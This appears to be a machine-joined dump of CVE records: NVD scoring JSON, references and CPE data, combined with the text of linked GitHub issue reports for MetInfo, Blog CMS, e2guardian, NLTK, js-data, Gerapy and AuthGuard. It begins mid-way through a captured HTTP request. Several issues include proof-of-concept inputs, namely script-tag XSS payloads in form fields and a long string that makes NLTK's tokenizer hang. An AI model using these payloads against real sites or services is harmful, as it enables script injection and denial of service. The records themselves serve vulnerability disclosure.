arrlanguage=metinfo; re_url=http%3A%2F%2F192.168.174.136%2FMetinfo%2Fadmin%2F; met_auth=7b9a826yxxHlC8hmmlnvj0qBQCdw1d2uVklMDkjbcWPwrcfJ%2B7EYen7QqGPcGExVUw2MvXoZWm95mMQXM1ba40dU8g; met_key=QCv7W3l; admin_lang=cn; page_iframe_url=http%3A%2F%2F192.168.174.136%2FMetinfo%2Findex.php%3Flang%3Dcn%26pageset%3D1; Hm_lpvt_520556228c0113270c0c772027905838=1571213989 Connection: close id=on&no_order=32&bigclass=0&classtype=1&name=%3Cscript%3Ealert('xss_test')%3C%2Fscript%3E&nav=3&module=1&foldername=xsstest ``` ![1571214303357](https://user-images.githubusercontent.com/45255270/66909609-a26a6b80-f03f-11e9-8a67-b82159aad53c.png) ![1571213869586](https://user-images.githubusercontent.com/45255270/66909596-9c748a80-f03f-11e9-90c9-3515da2dba65.png) ![1571214430269](https://user-images.githubusercontent.com/45255270/66915198-05153480-f04b-11e9-834a-b7d45560ff86.png)
MetInfo7.0 beta stored Cross Site Scripting Vulnerability
https://api.github.com/repos/unknownerror-bot/cve_test/issues/2/comments
0
2019-10-16T10:06:25Z
2019-10-16T11:27:46Z
https://github.com/unknownerror-bot/cve_test/issues/2
507,750,155
2
2,919
CVE-2020-20605
2021-12-22T23:15:07.763
Blog CMS v1.0 contains a cross-site scripting (XSS) vulnerability in the /controller/CommentAdminController.java component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/xuzijia/blog/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/xuzijia/blog/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:personal_blog_cms_project:personal_blog_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEACCC75-43F1-4665-8912-FEE73E543831", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xuzijia/blog/issues/4
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "xuzijia", "blog" ]
未进行过滤以及实体化用户输入的内容 有效负荷: <script>alert/xss/)</script> 文件名:blog/src/main/java/com/xuzijia/admin/blog/controller/ CommentAdminController.java 代码: ![1](https://user-images.githubusercontent.com/45255270/67692034-83be8a00-f9da-11e9-804e-38056fd3c9c6.png) 结果: ![3](https://user-images.githubusercontent.com/45255270/67692162-b7011900-f9da-11e9-8108-62f42d36f44c.png) ![2](https://user-images.githubusercontent.com/45255270/67692030-81f4c680-f9da-11e9-9598-1e86f1c997f2.png) 利用代码 exp代码如下:在后台评论管理处回复<script>alert(/xss/)<script> 点击提交后在查看对话中可以看到弹框
Blog CMS V1.0 feedback have a xss vulnerability
https://api.github.com/repos/xuzijia/blog/issues/4/comments
1
2019-09-26T08:15:10Z
2019-10-28T15:29:03Z
https://github.com/xuzijia/blog/issues/4
498,730,475
4
2,920
CVE-2021-44273
2021-12-23T12:15:07.387
e2guardian v5.4.x <= v5.4.3r is affected by missing SSL certificate validation in the SSL MITM engine. In standalone mode (i.e., acting as a proxy or a transparent proxy), with SSL MITM enabled, e2guardian, if built with OpenSSL v1.1.x, did not validate hostnames in certificates of the web servers that it connected to, and thus was itself vulnerable to MITM attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/23/2" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/e2guardian/e2guardian/commit/eae46a7e2a57103aadca903c4a24cca94dc502a2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/e2guardian/e2guardian/issues/707" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/23/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/e2guardian/e2guardian/commit/eae46a7e2a57103aadca903c4a24cca94dc502a2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/e2guardian/e2guardian/issues/707" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00010.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:e2bn:e2guardian:*:*:*:*:*:*:*:*", "matchCriteriaId": "3215FB43-3E00-4B8F-B56A-15E689EB7464", "versionEndExcluding": null, "versionEndIncluding": "5.4.3r", "versionStartExcluding": null, "versionStartIncluding": "5.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/e2guardian/e2guardian/issues/707
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "e2guardian", "e2guardian" ]
I tried e2guardian in a virtual machine today, running it as a standalone transparent proxy with SSL MITM, with the following iptables rules that redirect traffic to it (where 974 is the uid of the user that e2guardian runs as): ``` iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 974 -m tcp --dport 443 -j REDIRECT --to-ports 8443 iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 974 -m tcp --dport 80 -j REDIRECT --to-ports 8080 ``` I found that e2guardian enables browser connections to sites that it should not allow. One example is https://wrong.host.badssl.com/ This is very serious, because anyone on the path, who can intercept the connection or poison the DNS cache and thus redirect e2guardian's outgoing connection to a host under his control, now can perform a successful MITM attack. All he needs is any valid certificate - e2guardian will accept it for any host. ![Screenshot](https://user-images.githubusercontent.com/2943163/142741627-3f110c8d-4b1b-4e69-b772-7270e021f29e.png)
v5.4: Missing SSL hostname check
https://api.github.com/repos/e2guardian/e2guardian/issues/707/comments
4
2021-11-20T21:40:29Z
2021-12-23T17:25:50Z
https://github.com/e2guardian/e2guardian/issues/707
1,059,235,171
707
2,921
CVE-2021-43854
2021-12-23T18:15:07.327
NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Versions prior to 3.6.5 are vulnerable to regular expression denial of service (ReDoS) attacks. The vulnerability is present in PunktSentenceTokenizer, sent_tokenize and word_tokenize. Any users of this class, or these two functions, are vulnerable to the ReDoS attack. In short, a specifically crafted long input to any of these vulnerable functions will cause them to take a significant amount of execution time. If your program relies on any of the vulnerable functions for tokenizing unpredictable user input, then we would strongly recommend upgrading to a version of NLTK without the vulnerability. For users unable to upgrade the execution time can be bounded by limiting the maximum length of an input to any of the vulnerable functions. Our recommendation is to implement such a limit.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/commit/1405aad979c6b8080dbbc8e0858f89b2e3690341" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/issues/2866" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/pull/2869" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/security/advisories/GHSA-f8m6-h2c7-8h9x" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/commit/1405aad979c6b8080dbbc8e0858f89b2e3690341" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/issues/2866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/pull/2869" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/nltk/nltk/security/advisories/GHSA-f8m6-h2c7-8h9x" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*", "matchCriteriaId": "355BC362-D4FF-4893-9F37-B97D23E48267", "versionEndExcluding": "3.6.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/nltk/nltk/issues/2866
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nltk", "nltk" ]
Hi NLTK team, I have a string that I pass to `word_tokenize` (which uses `PunktSentenceTokenizer` under the hood), and the call hangs. The string in question is taken from Wikipedia and is the result of some vandalism. It can be generated by this ``` text = 'swirley thing w' + 'e' * (884779 - len('swirley thing w')) ``` The call seems to hang, I did not go deep too much but after running this for a couple of hours I just stopped the process. What would be an ok solution to process this in a robust fashion? I have a pipeline that has correct sentences as well as, from time to time, this kind of sentences.
word_tokenize/EN hangs on incorrect strings
https://api.github.com/repos/nltk/nltk/issues/2866/comments
4
2021-10-26T21:56:15Z
2021-11-26T11:58:19Z
https://github.com/nltk/nltk/issues/2866
1,036,775,249
2,866
2,922
CVE-2021-23574
2021-12-24T20:15:08.077
All versions of package js-data are vulnerable to Prototype Pollution via the deepFillIn and the set functions. This is an incomplete fix of [CVE-2020-28442](https://snyk.io/vuln/SNYK-JS-JSDATA-1023655).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/blob/master/dist/js-data.js%23L472" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/576" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/577" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2320790" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2320791" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSDATA-1584361" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/blob/master/dist/js-data.js%23L472" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/576" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/577" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2320790" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2320791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSDATA-1584361" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:js-data:js-data:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "BEDE0A25-D433-44F3-A0DD-766C85A894B0", "versionEndExcluding": "3.0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/js-data/js-data/issues/576
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "js-data", "js-data" ]
👋 Hello, @jmdobry, @crobinson42, @stalniy - a potential high severity Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (CWE-1321) vulnerability in your repository has been disclosed to us. #### Next Steps 1️⃣ Visit **https://huntr.dev/bounties/3-other-js-data/js-data** for more advisory information. 2️⃣ **[Sign-up](https://huntr.dev/)** to validate or speak to the researcher for more assistance. 3️⃣ Propose a patch or outsource it to our community - whoever fixes it gets paid. --- #### Confused or need more help? - Join us on our **[Discord](https://huntr.dev/discord)** and a member of our team will be happy to help! 🤗 - Speak to a member of our team: @JamieSlome --- *This issue was automatically generated by [huntr.dev](https://huntr.dev) - a bug bounty board for securing open source code.*
🚨 Potential Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (CWE-1321)
https://api.github.com/repos/js-data/js-data/issues/576/comments
3
2021-05-08T22:09:49Z
2021-07-30T19:48:06Z
https://github.com/js-data/js-data/issues/576
881,379,562
576
2,923
CVE-2021-23574
2021-12-24T20:15:08.077
All versions of package js-data are vulnerable to Prototype Pollution via the deepFillIn and the set functions. This is an incomplete fix of [CVE-2020-28442](https://snyk.io/vuln/SNYK-JS-JSDATA-1023655).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/blob/master/dist/js-data.js%23L472" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/576" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/577" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2320790" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2320791" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSDATA-1584361" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/blob/master/dist/js-data.js%23L472" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/576" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/js-data/js-data/issues/577" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2320790" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2320791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSDATA-1584361" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:js-data:js-data:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "BEDE0A25-D433-44F3-A0DD-766C85A894B0", "versionEndExcluding": "3.0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/js-data/js-data/issues/577
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "js-data", "js-data" ]
👋 Hello, @jmdobry, @crobinson42, @stalniy - a potential high severity Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (CWE-1321) vulnerability in your repository has been disclosed to us. #### Next Steps 1️⃣ Visit **https://huntr.dev/bounties/4-other-js-data/js-data** for more advisory information. 2️⃣ **[Sign-up](https://huntr.dev/)** to validate or speak to the researcher for more assistance. 3️⃣ Propose a patch or outsource it to our community - whoever fixes it gets paid. --- #### Confused or need more help? - Join us on our **[Discord](https://huntr.dev/discord)** and a member of our team will be happy to help! 🤗 - Speak to a member of our team: @JamieSlome --- *This issue was automatically generated by [huntr.dev](https://huntr.dev) - a bug bounty board for securing open source code.*
🚨 Potential Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (CWE-1321)
https://api.github.com/repos/js-data/js-data/issues/577/comments
7
2021-05-09T11:04:37Z
2022-01-10T21:01:10Z
https://github.com/js-data/js-data/issues/577
882,165,449
577
2,924
CVE-2021-43857
2021-12-27T19:15:08.683
Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/165459/Gerapy-0.9.7-Remote-Code-Execution.html" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/commit/49bcb19be5e0320e7e1535f34fe00f16a3cf3b28" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/219" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-9w7f-m4j4-j3xw" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/165459/Gerapy-0.9.7-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/commit/49bcb19be5e0320e7e1535f34fe00f16a3cf3b28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/219" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-9w7f-m4j4-j3xw" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gerapy:gerapy:*:*:*:*:*:*:*:*", "matchCriteriaId": "4D0D717F-412D-4BB2-940F-05640D17860E", "versionEndExcluding": "0.9.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/Gerapy/Gerapy/issues/219
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Gerapy", "Gerapy" ]
delete
Gerapy 0.9.7 project_configure function exist remote code execute !!!
https://api.github.com/repos/Gerapy/Gerapy/issues/219/comments
2
2021-12-02T12:51:31Z
2021-12-26T11:27:32Z
https://github.com/Gerapy/Gerapy/issues/219
1,069,513,691
219
2,925
CVE-2021-45890
2021-12-27T20:15:07.480
basic/BasicAuthProvider.java in AuthGuard before 0.9.0 allows authentication via an inactive identifier.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
